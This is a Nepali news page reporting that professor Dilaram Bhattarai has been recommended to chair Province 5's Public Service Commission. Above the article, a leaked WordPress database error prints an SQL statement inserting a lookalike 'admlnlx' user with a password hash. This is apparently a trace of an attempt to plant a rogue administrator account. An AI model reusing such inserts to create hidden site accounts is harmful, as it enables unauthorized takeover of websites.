WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B820pe8Qgqk/p7fm3GFACC8VBo/8re.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 23:19:03', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, १० साउन, बुटवल । प्रदेश ५ को लोकसेवा आयोगको अध्यक्षमा महेन्द्र बहुमुखी क्याम्पस दाङका प्राध्यापक डिलाराम भट्टराई सिफारिस भएका छन् ।
मुख्यमन्त्री शंकर पोखरेलको संयोजक रहेको तीन सदस्यीय समितिले सन्धिखर्क नगरपालिका वडा नम्बर १० अर्घाखाँचीका स्थायी बासिन्दा भट्टराईलाई अध्यक्षमा सिफारिस गर्ने निर्णय गरेको हो ।
प्रदेश लोकसेवा आयोग गठनका लागि मुख्यमन्त्री, सभामुख र प्रमुख प्रतिपक्ष दलको नेता रहेको सिफारिस समिति रहने प्रदेश लोकसेवा आयोग ऐनमा व्यवस्था छ ।
समितिको सिफारिसको आधारमा मन्त्रिपरिषदको बैठकले निर्णय गर्नेछ ।